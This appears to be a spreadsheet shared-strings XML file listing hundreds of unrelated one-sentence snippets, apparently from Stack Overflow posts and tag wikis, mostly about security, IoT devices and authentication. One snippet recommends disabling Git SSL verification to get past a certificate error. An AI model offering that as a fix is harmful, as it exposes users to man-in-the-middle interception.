    <t>A personal identification number (PIN) is a numeric password shared between a user and a system that can be used to authenticate the user.</t>
  </si>
  <si>
    <t>Notes of caution
Before using this code, understand the its (known) security and correctness limitations:
Unlike the KeePass/KeePassX GUI applications this code makes no attempt to secure its memory.</t>
  </si>
  <si>
    <t>This will allow you, for example, to analyze all application data without downloading them to the client and to execute some sensitive logics that require high security.</t>
  </si>
  <si>
    <t>The library analyzes images and video streams to identify license plates.</t>
  </si>
  <si>
    <t>Principles
Typeful: http4s uses Scalas type system to increase self-documentation and compile-time verification.</t>
  </si>
  <si>
    <t>Data synchronization refers to the idea of keeping multiple copies of a dataset in coherence with one another, or to maintain data integrity.</t>
  </si>
  <si>
    <t>It excludes unnecessary devices and guest functionality to reduce the memory footprint and attack surface area of each microVM.</t>
  </si>
  <si>
    <t>When the user first installs or runs your software, the presence of a ticket (either online or attached to the executable) tells Gatekeeper that Apple notarized the software.</t>
  </si>
  <si>
    <t>The language design pursues the following goals:
Compile-time error detection and prevention.</t>
  </si>
  <si>
    <t>You may not even have execution and/or access privileges to this memory depending on the specifics of your ARM core (Does it have an MMU, etc?).</t>
  </si>
  <si>
    <t>The UUID (ex: 00001101-0000-1000-8000-00805F9B34FB) is typically defined on the server part where a Bluetooth service is running with a specific identifier.</t>
  </si>
  <si>
    <t>Profiles allow you to manage user information without requiring you to create and maintain your own database.</t>
  </si>
  <si>
    <t>The AddressSanitizer ASan is a library for detecting different memory errors like buffer overflows and invalid pointer usages.</t>
  </si>
  <si>
    <t>Microsoft Graph Security API describes a security-specific API connected to the Microsoft Graph that provides standard interface and schema with security solutions from Microsoft and partners.</t>
  </si>
  <si>
    <t>The user-agent usually consists of the web browser type, the client operating system and device identifier (all with versions or builds).</t>
  </si>
  <si>
    <t>For distribution, Mozart provides a true network transparent implementation with support for network awareness, openness, and fault tolerance.</t>
  </si>
  <si>
    <t>The device I use for the SSH connection may vary &amp; the network used may also vary, so a script that relies on specific IP's isn't ideal.</t>
  </si>
  <si>
    <t>The reason for this particular error you are receiving is almost certainly that the BLE device itself is not storing the bonding information that is negotiated during the pairing process.</t>
  </si>
  <si>
    <t>The open of the unplugged device is most likely blocking because the device driver won't open if the device is not present.</t>
  </si>
  <si>
    <t>For example, Freescale has published a paper on Position Location Monitoring
Using IEEE 802.15.4/ZigBee technology.</t>
  </si>
  <si>
    <t>As James K Polk indicated, there was an error after the tLock.acquire(), every time the internet connection went off, causing deadlock of the program.</t>
  </si>
  <si>
    <t>But these functions are very dangerous in a novice's hands and can lead to memory corruption and crashing.</t>
  </si>
  <si>
    <t>This class exists for the benefit of hashing-based data structures.</t>
  </si>
  <si>
    <t>The Apache License is a free software license that does not provide copyleft protections, but does provide clauses for attribution and prevention of patent treachery.</t>
  </si>
  <si>
    <t>Smartcard readers typically support the protocols defined in the ISO/IEC 7816 series of standards.</t>
  </si>
  <si>
    <t>Copy protection which can be circumvented without modifying the file or device, such as serial numbers or keyfiles are not generally considered to be DRM.</t>
  </si>
  <si>
    <t>While, there are many practices established dedicated to the avoidance of leaks, the credo is always the same: Watch what you're using, clean up what you are not.</t>
  </si>
  <si>
    <t>Currently we are working on the database design and tought by ourself, how to keep this DB open(24/7) to the app(for the users) and still keep it safe.</t>
  </si>
  <si>
    <t>Probably the best short term solution for you is to enable auto-login on the console (the GUI has to be off) and call your program right after login.</t>
  </si>
  <si>
    <t>The problem of identifying an advertising iOS devices in background is still open.</t>
  </si>
  <si>
    <t>Last time I checked this capability was only licenced for non-commercial use.</t>
  </si>
  <si>
    <t>The ADO Connection Object is used to create an open connection to a data source.</t>
  </si>
  <si>
    <t>OpenSCEP is an open source implementation of the Simple Certificate Enrollment Protocol (SCEP) protocol.</t>
  </si>
  <si>
    <t>It is inspired by EasyMock but aims to simplify mock stubbing, verification and tooling even further.</t>
  </si>
  <si>
    <t>TurboPower LockBox 3 is a  native-code open source cryptographic library written in Delphi.</t>
  </si>
  <si>
    <t>Hiawatha is an open source webserver that focuses on security and ease-of-use.</t>
  </si>
  <si>
    <t>The web has enough problems with standards compliance as it is, and Shadowbox does its best to not perpetuate them.</t>
  </si>
  <si>
    <t>Also what's the best way to handle security, just base64 and encrypt your own data or is there a standardized format?</t>
  </si>
  <si>
    <t>Also what's the best way to handle security, just base64 and encrypt
  your own data or is there a standardized format?</t>
  </si>
  <si>
    <t>Of course you will need to enable all the necessary ports and handle certificate exchange.</t>
  </si>
  <si>
    <t>The crash is actually caused by hidinput not handling the ctrl key correctly.</t>
  </si>
  <si>
    <t>A transaction can only be deemed committed after it is safely in the log.</t>
  </si>
  <si>
    <t>It can connect on-premises applications with each other or map between different sets of identity information.</t>
  </si>
  <si>
    <t>Identify open customer queries.</t>
  </si>
  <si>
    <t>As such a Security Taxonomy helps us to understand these different approaches and meanings by providing a base level to work from.</t>
  </si>
  <si>
    <t>The best way to go is probably to design a device that connects via WiFi.</t>
  </si>
  <si>
    <t>The certificates created are for testing purposes only.</t>
  </si>
  <si>
    <t>"OGD Wien" is the official platform for open government data from Vienna.</t>
  </si>
  <si>
    <t>Gremlin Server is a component of Apache TinkerPop that allows for the remote execution of Gremlin-based traversals.</t>
  </si>
  <si>
    <t>When you publish your own code on the server, it authomatically becomes Open Source.</t>
  </si>
  <si>
    <t>So this was an permissions based fault.</t>
  </si>
  <si>
    <t>Code samples:
Embedding a web browser with SDK/C++, by Lucian Wischik
WinForms HTML Editor
csexwb2 - The most complete .NET Webbrowser control wrapper
The HtmlEditor - a C# control that wraps MSHTML
Resources:
WebBrowser Control Overviews and Tutorials
Hosting and Reuse
The MSHTML Host Security FAQ: Part II of II
Feature Control Registry Index
Defining document compatibility
Mark of the Web</t>
  </si>
  <si>
    <t>From the past sites that I have run as well as moderated I have learnt that moderators need to be considerate as well as vigilant, Within my life I have been known to be able to talk any single person and be able to read there character and personality and respond with the correct tone,manner and body language to be able to keep a certain level of respect.</t>
  </si>
  <si>
    <t>This has also been reported in a debian bug, but there has not been any progress for years: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=662960
The ssmtp version in the Redhat packages has been patched to atleast verify the certificate, but the hostname is still NOT being verified and the encryption is therefore as insecure as on debian/ubuntu.</t>
  </si>
  <si>
    <t>The standard procedure for obtaining the Orange Pi's IP seems to be to log in to the admin Interface of the router, and to pull it out from there--but I am unable to do that because I am using my school's networks--and our IT Department has never had to perform anything like this, so the project has been put on hold.</t>
  </si>
  <si>
    <t>DomainKeys Identified Mail (DKIM) is a method for associating a domain name to an email message, thereby allowing a person, role, or organization to claim some responsibility for the message.</t>
  </si>
  <si>
    <t>Storing sensitive data in signed-XML format has been around for quite some time and Rhino Licensing uses the same technique to generate application licensing data.</t>
  </si>
  <si>
    <t>Git Clone Fails: Server Certificate Verification Failed - The suggested solution here is simply to disable SSL verification, which I don't really understand since it's always worked up until now.</t>
  </si>
  <si>
    <t>I've extracted a code sample from the Microsoft's IoT Sample (IoTCoreDefaultApp) that might helpful to you to extract device information (unfortunately, processor serial number never exposed for programming).</t>
  </si>
  <si>
    <t>In this case since you control the code on both the Android phone and the ESP32, you can pre-share a key between them and encrypt the sensitive information before you pass it to Bluetooth.</t>
  </si>
  <si>
    <t>Testing software by presenting it with invalid input to find errors in input validation and handling.</t>
  </si>
  <si>
    <t>We will make an effort to support the public and protected surface of the library and maintain backwards compatibility in the future.</t>
  </si>
  <si>
    <t xml:space="preserve">
PHPDocX can create, and digitally sign if required, Word documents
  from scratch or use predefined templates to simplify your work.</t>
  </si>
  <si>
    <t>'master' database holds critical system related information that includes, logins, passwords, and dataserver configuration parameters.</t>
  </si>
  <si>
    <t>Programs which comes with platform detection features can be useful for completing independent user interfaces for specific platforms, for example, between mobile and Mac.</t>
  </si>
  <si>
    <t>ObjectName: This is a composite key that serves to both define the unique identity of one MBean, and as pattern that describes a group of MBeans that have matching sub-keys of their ObjectNames in common.</t>
  </si>
  <si>
    <t>E-mail address spoofing is an act of forging an e-mail header to make it appear as if it came from somewhere or someone other than the actual source.</t>
  </si>
  <si>
    <t>In  order to protect sd card from corruption I would like to minimize data written to permanent memory.</t>
  </si>
  <si>
    <t>An open source trusted cloud native registry project that stores, signs, and scans content</t>
  </si>
  <si>
    <t>In Attribute Based Access Control (ABAC), an authorization decision may be based upon attributes provided by a trusted authority.</t>
  </si>
  <si>
    <t>Since 2^15 is about 32,000 you need 14 or 15 bits to create a unique address for each memory storage location.</t>
  </si>
  <si>
    <t>This can open up gaping security issues though, so I would not recommend taking this approach unless you're extremely confident that this is on a private, and/or secured network.</t>
  </si>
  <si>
    <t>After that you will be able to send correct AT commands to open socket and communicate thru the Internet.</t>
  </si>
  <si>
    <t>Additional comment: I have to say that LoRa is not a good choice if security is a critical issue in your App.</t>
  </si>
  <si>
    <t>So the class is not "Thread Safe" so trying to do anything in a multi-threaded manner is not a good idea.</t>
  </si>
  <si>
    <t>fclose closes an open file resource, releasing it from memory and any write-locks on the file.</t>
  </si>
  <si>
    <t>(if it's a good question, unanswered, or has poor answers, possibly review for migration to IT Security if it's on topic for there)</t>
  </si>
  <si>
    <t>Use of secure password hashes or, even better, purpose-built algorithms such as BCrypt for this purpose is critical.</t>
  </si>
  <si>
    <t>Directory traversal is a form of HTTP exploit in which a hacker uses the software on a Web server to access data in a directory other than the server's root directory.</t>
  </si>
  <si>
    <t>Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</t>
  </si>
  <si>
    <t>The Microsoft Graph Security API describes a security-specific API connected to the Microsoft Graph that provides standard interface and schema with security solutions from Microsoft and partners.</t>
  </si>
  <si>
    <t>The user mode virtual addresses are memory mapped regions from the GPU (to be safe from CPU cache).</t>
  </si>
  <si>
    <t>** The Apache License is a free software license that does not provide copyleft protections, but does provide clauses for attribution and prevention of patent treachery.</t>
  </si>
  <si>
    <t>NETELLER is an e-money/e-wallet service owned and operated by publicly traded British global payments company Paysafe Group Plc.</t>
  </si>
  <si>
    <t>A user trust system that grants users additional rights to assist in moderating the forum as they participate in good faith over time.</t>
  </si>
  <si>
    <t>Cryptographically strong PBE should follow recommendations for the implementation of password-based cryptography described in RFC 2898.</t>
  </si>
  <si>
    <t>RPC stands for remote procedure call, which is a family of protocols.</t>
  </si>
  <si>
    <t>Generally, the security mechanism and user have a communication that is virtually one way, for good reason.</t>
  </si>
  <si>
    <t>If we open the firewall the process starts up as it's supposed to.</t>
  </si>
  <si>
    <t>And It should be encoded by base64 and 'encode' function which is referred from link I wrote above.</t>
  </si>
  <si>
    <t>Based on the document "Using the MQTT protocol directly", you need 
to download and reference the DigiCert Baltimore Root Certificate.</t>
  </si>
  <si>
    <t>Some locations will have laws requiring information systems implementers to protect PII for users of their systems.</t>
  </si>
  <si>
    <t>The Intel x86 Encoder Decoder Software Library is an open-source library that can be used to decode and encode x86 machine code.</t>
  </si>
  <si>
    <t>The CCXT library is used to connect and trade with cryptocurrency / altcoin exchanges and payment processing services worldwide.</t>
  </si>
  <si>
    <t>Plugins are available for several tracking systems and they offer a web based version.</t>
  </si>
  <si>
    <t>Program received signal SIGILL, Illegal instruction.</t>
  </si>
  <si>
    <t>First verify your script execution's permission, if it's have a execution permission.</t>
  </si>
  <si>
    <t>You can see an example Swift program which transfers data to and from AWS IoT over MQTT using certificate-based authentication here.</t>
  </si>
  <si>
    <t>After adding the certificate, you can get it through getIdentityRef based on the tag as described in getIdentityRef.</t>
  </si>
  <si>
    <t>In browser you have to implement Extended Flow (https://aws.amazon.com/blogs/mobile/understanding-amazon-cognito-authentication-part-4-enhanced-flow/)
You need to  in IoT for your user's Cognito identityId - it will be used as principal (it the same way as devices are using certificates).</t>
  </si>
  <si>
    <t>Snoop is the open source WPF spying utility.</t>
  </si>
  <si>
    <t>It can also be used to reveal additional information to the user and many other purposes.</t>
  </si>
  <si>
    <t>My understanding is Pygame itself cannot handle this and it is up to SDL to handle transparency between dispmanx layers.</t>
  </si>
  <si>
    <t>I want to automate this process -&gt; that it will start up automaticly after Rpi boot and login "pi" user.</t>
  </si>
  <si>
    <t>Warden is a Rack-based middleware, designed to provide a mechanism for authentication in Ruby web applications.</t>
  </si>
  <si>
    <t>PDP-10 operating system developed by MIT hackers.</t>
  </si>
  <si>
    <t>In March 2013 the Offensive Security team later replaced it with a successor product, Kali Linux.</t>
  </si>
  <si>
    <t>I'm not concerned with security for this project.</t>
  </si>
  <si>
    <t>For more information, see https://www.agwa.name/projects/git-crypt.</t>
  </si>
  <si>
    <t xml:space="preserve">
The Facebook Hacker Cup is an annual worldwide programming competition where hackers compete against each other for fame, fortune, glory and a shot at the coveted Hacker Cup.</t>
  </si>
  <si>
    <t>Compilation usually involves the following steps:
Scanning - The scanner is responsible of tokenizing the source code into the smallest chunks of information (keywords, operators, brackets, variables, literals etc.).</t>
  </si>
  <si>
    <t>CoovaChilli is a feature rich software access controller that provides a captive portal / walled-garden environment and uses RADIUS or a HTTP protocol for access provisioning and accounting.</t>
  </si>
  <si>
    <t>It was assembled from 25 different code libraries from Google and third parties such as Mozilla's Netscape Portable Runtime, Network Security Services, NPAPI, as well as sqlite and a number of other open-source projects.</t>
  </si>
  <si>
    <t>Depending on the concurrency control method (i.e., if it uses strict - as opposed to relaxed - serializability), the effects of an incomplete transaction might not even be visible to another transaction.</t>
  </si>
  <si>
    <t>I've seen that many advise to reflash the ESP with an Arduino derived firmware aka WiFiClientSecure and thus avoid working with the AT-commands (indeed I found NO library to specifically (and reliably) work with them).</t>
  </si>
  <si>
    <t>Try:
git config --global http.sslVerify false
to disable verification it lets you clone but it's not the best solution you should check server configuration.</t>
  </si>
  <si>
    <t>Any subset of these APKs can be installed together, as long as the following constraints are met:
All APKs must have the exact same package name, version code, and signing certificates.</t>
  </si>
  <si>
    <t>I am using my ePassport (EU standard) and I want to start the Basic Access Control (BAC) procedure by sending the  command to its RFID chip.</t>
  </si>
  <si>
    <t>I have some problems with collecting BLE advertisements using standard BluetoothLEAdvertisementWatcher in Windows IoT (Rpi3)
Only 30% of packets has been captured.</t>
  </si>
  <si>
    <t>Typically, this hook is used to protect against commits that are disallowed due to content or location (e.g.</t>
  </si>
  <si>
    <t>Now, while shipping this product (software + hardware) to my customer, I want that no one should log in to the raspberry pi and get access to my code.</t>
  </si>
  <si>
    <t>Goal: Raspberry pi boot, open chromium, open website, credentials inserted automatically, and Login.</t>
  </si>
  <si>
    <t>In terms of security this is far better than running apache as root or the wide open sudo permissions you list in your solution update.</t>
  </si>
  <si>
    <t>Nothing is wrong with SSH, but people typically use web servers on the Pi plus HTTP requests on the Android side.</t>
  </si>
  <si>
    <t xml:space="preserve"> closes an open file resource, releasing it from memory and any write-locks on the file.</t>
  </si>
  <si>
    <t>PSR-1
Aims to ensure a high level of technical interoperability between shared php code.</t>
  </si>
  <si>
    <t>Because C++0x is not yet standard, answers that are currently valid may become invalid if the standard changes in the future.</t>
  </si>
  <si>
    <t>If I wish to distribute a NodeMCU-based device, I would want my end user to set the Wifi password and then store it.</t>
  </si>
  <si>
    <t>Simply put, robust code does not trust use/file input until it is qualified and meets expectations.</t>
  </si>
  <si>
    <t>Token seems not able to be canceled but you can disable the specified device to mitigates the risks of using tokens with long expiry times.</t>
  </si>
  <si>
    <t>Typically, this would involve some sort of encryption or manipulation of permissions so that not everyone can see the password of a given user.</t>
  </si>
  <si>
    <t>Grok are currently developing a shrink-wrapped anomaly-detection and monitoring service for AWS, based on NuPIC.</t>
  </si>
  <si>
    <t>This tag covers all Okta products:
- Identity 
- Mobility
- Single sign on
- Integrations
etc.</t>
  </si>
  <si>
    <t>Purpose
Many users worry about what kind of information can be traced back to them.</t>
  </si>
  <si>
    <t>We can recover this .tmp file I'm not confident that we should base our solution on undocumented behaviour.</t>
  </si>
  <si>
    <t>i develop a Home Detection System for office security used based on youtube video.</t>
  </si>
  <si>
    <t>I have disabled the intrusive prevention mode and it can now access from the internet.</t>
  </si>
  <si>
    <t>Opening the file for the write then closing it afterwards prevents any data corruption.</t>
  </si>
  <si>
    <t>Raspberry Pi is not a platform I would consider appropriate for shipping to production as a product without some physical protection.</t>
  </si>
  <si>
    <t>KERN_INVALID_ADDRESS error is a generic error that is followed by a specific memory address location.</t>
  </si>
  <si>
    <t>For questions about the open source cert-manager project for Kubernetes, by Jetstack.</t>
  </si>
  <si>
    <t>However, using these features incorrectly may lead to memory corruption errors.</t>
  </si>
  <si>
    <t>In its simplest form, authopen verifies
     that it is allowed to open filename (using an appropriate sys.openfile.</t>
  </si>
  <si>
    <t>Note that verification of locations is not supported via the API.</t>
  </si>
  <si>
    <t>QuickFIX is not crippled, all of the source is open for all supported versions of FIX.</t>
  </si>
  <si>
    <t>It can recover the plaintext from the ciphertext by sending multiple manipulated ciphertexts to the oracle.</t>
  </si>
  <si>
    <t>Notable changes:
New Project Space which puts the focus on the Quality Gate and the Leak Period
User tokens for authenticated analysis without passwords
New web services to facilitate a build breaker strategy
Cross-project duplication is back!</t>
  </si>
  <si>
    <t>Provide API permission 
javax.microedition.io.SocketProtocolPermission(socket://:)
javax.microedition.io.SocketProtocolPermission(socket://:*)
in your jad file
You can do it in netbeans by navigating project property -&gt; Application Descriptor
select API Permission tab.</t>
  </si>
  <si>
    <t>It was designed with a focus on both data integrity and decoder availability.</t>
  </si>
  <si>
    <t>https://youtu.be/F9yMTdcd33w?t=240
However, the Android application does not come back with the information of a device once it is already connected.</t>
  </si>
  <si>
    <t>authority = only used by the CONNECT method</t>
  </si>
  <si>
    <t>I want to communicate with device which firmware is described there
Here is my code.</t>
  </si>
  <si>
    <t>Would there be security risks?</t>
  </si>
  <si>
    <t>The id is to identify the sensor (duh!)</t>
  </si>
  <si>
    <t>So the code below doesn't really do anything useful, but it shouldn't leak, should it?</t>
  </si>
  <si>
    <t>I want to program a little "hello world" bare metal application on the Intel Galileo board.</t>
  </si>
  <si>
    <t>Looks like concat is bugged.</t>
  </si>
  <si>
    <t>But I do not see any authentication in the process.</t>
  </si>
  <si>
    <t>I am trying to access intel (cavecreek) gpio controller from user space.</t>
  </si>
  <si>
    <t>The conn.net... commands are part of the NodeMCU firmware (see link).</t>
  </si>
  <si>
    <t>The PubNub library indicates that it is designed to work with an Ethernet or WiFi shield.</t>
  </si>
  <si>
    <t>How would I access this information?</t>
  </si>
  <si>
    <t>I am not concerned about data security.</t>
  </si>
  <si>
    <t>In order to get some home automation software to work, I need to have public access to my Raspberry Pi 3.</t>
  </si>
  <si>
    <t>or if I can't,
How can I can identify the android device?</t>
  </si>
  <si>
    <t>Is there any apparent flaw in the code?</t>
  </si>
  <si>
    <t>I'm using Waveshare's fingerprint stm32f205, which I connected to an Arduino Uno R3 and communicated with it via Java with the RXTXComm library.</t>
  </si>
  <si>
    <t>Is there other information I need to verify?</t>
  </si>
  <si>
    <t>Is there a way to prevent ntpd to respond before it has actually synchronized?</t>
  </si>
  <si>
    <t>I need to connect to enterprise wifi, and this tool is the only way I know to do that.</t>
  </si>
  <si>
    <t>I am trying to set up emerald crypto mining software on my raspberry pi.</t>
  </si>
  <si>
    <t>After removing grep it doesn't identify Wifi.</t>
  </si>
  <si>
    <t>I need that my server (raspberry/raspbian) execute a shell command at process startup (and not at login).</t>
  </si>
  <si>
    <t>(For example: I want to get information from my YouTube channel but I need the cookie to sign in.)</t>
  </si>
  <si>
    <t>I want to use these devices to work as a surveillance / babycam, i.e.</t>
  </si>
  <si>
    <t>Also ubuntu is able to identify this device.</t>
  </si>
  <si>
    <t>Like from parsec or any other software?</t>
  </si>
  <si>
    <t>I have a PFX file which I use to sign any software using .</t>
  </si>
  <si>
    <t>Also, I'm still somewhat of a newbie when it comes to AVRs, so I'm sure my code is far from being as robust as it could be.</t>
  </si>
  <si>
    <t>(says Incorrect login information.</t>
  </si>
  <si>
    <t>There's no intelligence in the relay controller.</t>
  </si>
  <si>
    <t>For an 8Kb bootloader it took something like 10 s with verification.</t>
  </si>
  <si>
    <t>If nobody else is going to use your code such countermeasures are not needed and will not be described here.</t>
  </si>
  <si>
    <t>DO NOT use FTP to transfer sensitive data.</t>
  </si>
  <si>
    <t>The PID stored in @pid will be that of sudo not that of the arecord process.</t>
  </si>
  <si>
    <t>If it doesn't, then the code or your hack on the Arduino Uno may be at fault.</t>
  </si>
  <si>
    <t>Standard beacons (iBeacon, Eddystone, AltBeacon) are transmit only devices.</t>
  </si>
  <si>
    <t>First of all you have to identify your device.</t>
  </si>
  <si>
    <t>More explaination for the security of IoTHub, please see the offical document .</t>
  </si>
  <si>
    <t>http://source.sierrawireless.com/resources/airprime/minicard/2130617_ac_ap_umts_supported_at_command_reference/
Free signup on sierrawireless if you don't have login.</t>
  </si>
  <si>
    <t>Both the computer USB port and arduino have some kind of protection.</t>
  </si>
  <si>
    <t>If you want to debug your device, please provide your device information.</t>
  </si>
  <si>
    <t>If this is what you actually want, the approach in here could be useful: Pygame through SSH does not register keystrokes (Raspberry Pi 3)</t>
  </si>
  <si>
    <t>: On (slide to the right)
Use TLS must be on for IBM Blockchain fabrics.</t>
  </si>
  <si>
    <t>I hope your binary has debug information, otherwise this is going to be much more work.</t>
  </si>
  <si>
    <t>For example, for login, as you described it:</t>
  </si>
  <si>
    <t>:
Now how do you access that information?</t>
  </si>
  <si>
    <t>Then you can access this information anywhere on the internet.</t>
  </si>
  <si>
    <t>You can also use AWS KMS to store the sensitive data.</t>
  </si>
  <si>
    <t>This one is undocumented as well!</t>
  </si>
  <si>
    <t>Microphone identification
3.</t>
  </si>
  <si>
    <t>After the activation the AppSKey is used.</t>
  </si>
  <si>
    <t>Please refer to File access permissions.</t>
  </si>
  <si>
    <t>Use this code to get device information.</t>
  </si>
  <si>
    <t>It refers to invalid ssl certificate.</t>
  </si>
  <si>
    <t>It is able to communicate with Arduino via Audio Jack without jailbreak.</t>
  </si>
  <si>
    <t>WBF stands for Windows Biometric Framework from Microsoft.</t>
  </si>
  <si>
    <t>HASP - Hardware Against Software Piracy.</t>
  </si>
  <si>
    <t>Signpost is a Java OAuth-1.0 framework under APL-2.0 license written and maintained by Matthias Kppler.</t>
  </si>
  <si>
    <t>Wireless Application Protocol (WAP) is a technical standard for accessing information over a mobile wireless network.</t>
  </si>
  <si>
    <t>You own the servers and can access the source codes of the running system.</t>
  </si>
  <si>
    <t>a software bug.</t>
  </si>
  <si>
    <t>vsftpd, which stands for "Very Secure FTP Daemon", is a lightweight FTP server for Unix-like systems.</t>
  </si>
  <si>
    <t>This tool can be used for C / C++ codes.</t>
  </si>
  <si>
    <t>Mod_auth_kerb is an Apache module designed to provide Kerberos authentication to the Apache web server.</t>
  </si>
  <si>
    <t>GTBank's Payment Gateway for doing monetary transactions.</t>
  </si>
  <si>
    <t>AV stands for anti-virus.</t>
  </si>
  <si>
    <t>A user space daemon for access point and authentication servers.</t>
  </si>
  <si>
    <t>The algorithm was developed by two Belgian cryptographer Joan Daemen and Vincent Rijmen.</t>
  </si>
  <si>
    <t>Almost all data is in some way sensitive.</t>
  </si>
  <si>
    <t>A communications protocol provided by OMRON to exchange information in FA networks.</t>
  </si>
  <si>
    <t>Access Point identifies an IP Packet Data Network (PDN), that a mobile data user wants to communicate with.</t>
  </si>
  <si>
    <t>Freeware often comes in binaries.</t>
  </si>
  <si>
    <t>sha256 stands for .</t>
  </si>
  <si>
    <t>A few examples of anti-cheat software are DMW Anticheat, GameGuard, PunkBuster, VAC, ProtectEnviron, ShoxGuard, CleanDoD, XRay, xTrap, HackShield, Warden or BattlEye.</t>
  </si>
  <si>
    <t>For more information: Worklight mobile application security</t>
  </si>
  <si>
    <t>Source: Lavarel Security</t>
  </si>
  <si>
    <t>The value of the faultactor attribute is a URI identifying the source.</t>
  </si>
  <si>
    <t>See oauth for more information about the OAuth standards.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a program that implements the bitcoin protocol for command line and rpc use.</t>
  </si>
  <si>
    <t>LastPass Password Manager is a freemium password management service developed by LastPass.</t>
  </si>
  <si>
    <t>RC4 was designed by Ron Rivest of RSA Security in 1987.</t>
  </si>
  <si>
    <t>It also covers QR codes and barcodes.</t>
  </si>
  <si>
    <t>Source: Github krypt-ossl</t>
  </si>
  <si>
    <t>Please see the login tutorial for Android for more information.</t>
  </si>
  <si>
    <t>Please see the login tutorial for iOS for more information.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a user space daemon for access point and authentication servers.</t>
  </si>
  <si>
    <t>pam_unix is the standard Unix authentication module.</t>
  </si>
  <si>
    <t>The OPC Data Access specification is also known as OPC DA.</t>
  </si>
  <si>
    <t>Source: https://en.wikipedia.org/wiki/Two-factor_authentication</t>
  </si>
  <si>
    <t>More information: 
Wikipedia 
Intel information for developpers</t>
  </si>
  <si>
    <t>More information see Wikipedia or crypto wiki</t>
  </si>
  <si>
    <t>(Source)
git-crypt was written by Andrew Ayer (agwa@andrewayer.name).</t>
  </si>
  <si>
    <t>See also:
Software Quality Assurance and Testing (stackexchange)
Software Quality Assurance (wikipedia)</t>
  </si>
  <si>
    <t>cryptanalysis and software bugs).</t>
  </si>
  <si>
    <t>(AES deviated from the original Rijndael proposal)
The Rijndael cipher was developed by two Belgian cryptographers: Joan Daemen and Vincent Rijmen</t>
  </si>
  <si>
    <t>Introduction
Microsoft SEAL is an easy-to-use homomorphic encryption library, developed by researchers in the Cryptography Research Group at Microsoft Research.</t>
  </si>
  <si>
    <t>A scanner for tokenizing Java source files.</t>
  </si>
  <si>
    <t>Source from : Form authentication microsoft</t>
  </si>
  <si>
    <t>You get thread-safety by design.</t>
  </si>
  <si>
    <t>access is a generic tag and does not refer to Microsoft Access, the tag for which is ms-access.</t>
  </si>
  <si>
    <t>For more information see Locks in Java</t>
  </si>
  <si>
    <t>scrypt is where the game is at!</t>
  </si>
  <si>
    <t>I've experienced some authentication issues in the past and I've addressed them following the next steps:
1) Identify version numbers of both  server and mongoose
2) Identify what authentication mechanism does your server use and make sure that mongoose is trying to authenticate with the one your server is expecting.</t>
  </si>
  <si>
    <t>It is intended for space constrained environments such as HTTP Authorization headers and URI query parameters.</t>
  </si>
  <si>
    <t>I would like Home-Assistant, which typically functions as a Websockets server itself to be able to monitor/control the security system by acting as the client(?</t>
  </si>
  <si>
    <t>Purpose of Hystrix
Give protection from and control over latency and failure from dependencies (typically accessed over network) accessed via 3rd party client libraries.</t>
  </si>
  <si>
    <t>Mgrammar language allows a developer to define a schema to validate textual input or map textual input into data structures.</t>
  </si>
  <si>
    <t>A hacker can use some techniques to change the policy name in code then it might cause a major vulnerability.</t>
  </si>
  <si>
    <t>If Oracle has been initialized, then on some operating systems, verify that Oracle was linked correctly.</t>
  </si>
  <si>
    <t>With this mechanism, the process takes on the uid gid of the executable, and can then access the devices with the right access level.</t>
  </si>
  <si>
    <t>Mgrammar language can to define a schema to validate textual input or map textual input into data structures.</t>
  </si>
  <si>
    <t>But when I run the project the return values are some sort of compromised.</t>
  </si>
  <si>
    <t>On Android Things I can load the app and login fine, but when I open the QR scanner tab I get a crash.</t>
  </si>
  <si>
    <t>This can either be for the purpose of finding hosts, connecting to a service or network security assessment.</t>
  </si>
  <si>
    <t>The file format was designed with a focus on both data integrity and decoder availability.</t>
  </si>
  <si>
    <t>I'm trying to set up my pi to operate through SSH in anticipation of a robot project.</t>
  </si>
  <si>
    <t>For testing, I extracted just the code from google where the authentification happens and bundled it as a seperated jar.</t>
  </si>
  <si>
    <t>WS-Federation is an Identity Federation specification, which provides mechanisms for allowing differential security realms.</t>
  </si>
  <si>
    <t>You have complete control over the authentication process in the new .</t>
  </si>
  <si>
    <t>FileSaver.js is the solution to saving files on the client-side, and is perfect for web applications that need to generate files, or for saving sensitive information that shouldn't be sent to an external server.</t>
  </si>
  <si>
    <t>Furthermore typically input devices can be read only by privileged user (on older/current systems) or by user holding a 'seat' (on rootless X systems) - assuming you're not using bleeding edge system it means your game can only by used by root user which is usually considered a bad idea.</t>
  </si>
  <si>
    <t>The documentation for the device says that it communicates via the Kermit protocol.</t>
  </si>
  <si>
    <t>Now i'm getting permission error (from child process):</t>
  </si>
  <si>
    <t>In server machine data are manipulated using a C++ application.</t>
  </si>
  <si>
    <t>When I start MPI Processes checkpointing seems to work well.</t>
  </si>
  <si>
    <t>This also includes emergency bells, such as when there is an earthquake threat or an armed intruder.</t>
  </si>
  <si>
    <t>I created the certificates just like it is described in the Readme files.</t>
  </si>
  <si>
    <t>I am working on ECG project for biometric identification: I use Arduino + Olimex ECG/EKG Shield and transmit the data to MatLab.</t>
  </si>
  <si>
    <t>So far the codes have been uploaded to my arduino flawlessly.</t>
  </si>
  <si>
    <t>How can I fix the missing HID Device Descriptor?</t>
  </si>
  <si>
    <t>The file connection_string.js does not have my computer's username in it, despite the error saying that it does.</t>
  </si>
  <si>
    <t>and I can't see the data identification,
Anyone can help me please?</t>
  </si>
  <si>
    <t>I am trying to use Microsoft Teams to control Raspberry Pi Devices.</t>
  </si>
  <si>
    <t>For information about network troubleshooting, see Windows Help.</t>
  </si>
  <si>
    <t>Somehow during the course of the program the EEPROM data gets corrupted.</t>
  </si>
  <si>
    <t>I've been following an opencv tutorial from Sir Adrian Rosebrock for a home surveillance system.</t>
  </si>
  <si>
    <t>I looked up the SOX software and tried doing it over SSH but can't figure it out.</t>
  </si>
  <si>
    <t>I have found the verification works in Python/Paho using the same certificate.</t>
  </si>
  <si>
    <t>I have tried using 'utf-8' and 'iso-8859-1' for decoding but still it doesnt show the same decrypted data.</t>
  </si>
  <si>
    <t>The idea is that it can be remote accessed and controlled from another computer.</t>
  </si>
  <si>
    <t>Also, be careful what sources you use to compile your firmware.</t>
  </si>
  <si>
    <t>Just for safety do it on both platforms!</t>
  </si>
  <si>
    <t>However, a safety factor of 1 000 should be enough.</t>
  </si>
  <si>
    <t>If you want case sensitive, take a look at -name.</t>
  </si>
  <si>
    <t>This is possible from user space (although you may need to be root).</t>
  </si>
